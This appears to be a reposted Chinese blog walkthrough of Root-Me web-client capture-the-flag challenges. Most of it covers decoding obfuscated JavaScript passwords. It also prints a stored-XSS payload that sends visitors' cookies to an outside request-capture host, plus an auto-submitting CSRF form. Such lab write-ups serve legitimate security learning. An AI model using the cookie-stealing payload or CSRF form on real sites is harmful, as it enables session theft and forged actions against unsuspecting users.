root-me web-client过关斩将

Root-me-web-client过关斩将

1题,Javascript - Authentication

F12查看js的源代码,发现用户名和密码

690872-20160511162532359-1666843743.jpg

2题,Javascript - Source

F12查看js的源代码,在判断语句中看到pass

690872-20160511162533312-620113203.jpg

3题,Javascript - Authentication 2

F12查看js的源代码,在一个数组中看到pass

690872-20160511162533718-1208904907.jpg

4题,Javascript - Obfuscation 1

F12查看js的源代码,看到一个加密的pass

pass = '%63%70%61%73%62%69%65%6e%64%75%72%70%61%73%73%77%6f%72%64';

使用notepad++解密

插件---mimetool---unldecode—

690872-20160511162534140-384575454.jpg

5题,Javascript - Obfuscation 2

F12查看js的源代码,看到一串js代码没有执行

varpassunescape("unescape%28%22String.fromCharCode%2528104%252C68%252C117%252C102%252C106%252C100%252C107%252C105%252C49%252C53%252C54%2529%22%29");

使用firebox—控制台---运行一下,发现还是一个js执行语句,那就继续操作

执行三次就出现了最终的结果。

6题,Javascript - Native code

查看页面源代码,发现了js的一些代码,但是我们会看不懂是什么加密

690872-20160511162534499-1810899454.jpg

这个时候我们下载插件js反混淆器

找到加密这一点,向下查找,就找到对应的函数了

690872-20160511162534859-638704737.jpg

7题,Javascript - Obfuscation 3

F12查看页面源代码,发现fromcharcode代码一行

\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30

使用notepad++ \x替换%

%35%35%2c%35%36%2c%35%34%2c%37%39%2c%31%31%35%2c%36%39%2c%31%31%34%2c%31%31%36%2c%31%30%37%2c%34%39%2c%35%30

然后使用urldecode解密一下

55,56,54,79,115,69,114,116,107,49,50

接着我们就在firebox里面运行一下吧

String.fromCharCode(55,56,54,79,115,69,114,116,107,49,50)

690872-20160511162535421-324317112.jpg

8题,XSS - Stored 1

牵扯到一个浏览版的xss,存储性的xss漏洞获取cookie

首先我们上传一张远程连接的图片,发现能上传成功

690872-20160511162535812-273111235.jpg

登录requestb.in,创建一个新的链接请求

http://requestb.in/10886hi1

然后再留言本哪里添加这样的一句话

<script>document.write('<img src=\"http://requestb.in/1n1rscg1?cookie=='+document.cookie+'\">aaaa</img>');</script>

提交留言

当别人再次访问这个留言本页面的时候,我们就获取到了他的cookie

刷新requestb,我们就可以看到所有访问该页面人的cookie  

690872-20160511162536218-1965909246.jpg

9题,CSRF - 0 protection

Csrf跨站请求,不是admin用户

首先我们可以通过观察profile,我们看到源码吗,所有我们上传一个csrf跨站脚本

伪造了一个登录页面

 

<html>

<head></head>

<body>

<form name="csrdf" action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="post" enctype="multipart/form-data">

<input type="hidden" name="username" value="121">

<input type-"hidden" name="status" value="on">

</from>

<script>document.csrf.submit()</script>

</body>

</html>

然后刷新页面Private

690872-20160511162536593-627363830.jpg

 

10题,Javascript - Obfuscation 5

查看源代码,发现要用到ttt.js,然后我们直接访问一下ttt.js

690872-20160511162537343-972555847.jpg

接着我们将代码转化成js的形式,使用Malzillada tool

690872-20160511162537827-289181486.jpg

然后打开http://jsbeautifier.org/

放到里面美化js代码

将美化好的ttt.js插入到源代码ttt.js的地方

查看源代码,发现有出错误,修改过来

690872-20160511162538249-311092856.jpg

没做完。。。。。不会了





转载于:https://www.cnblogs.com/lazy0/p/cbdefb1d39e96c46c33ad5d59f67f473.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值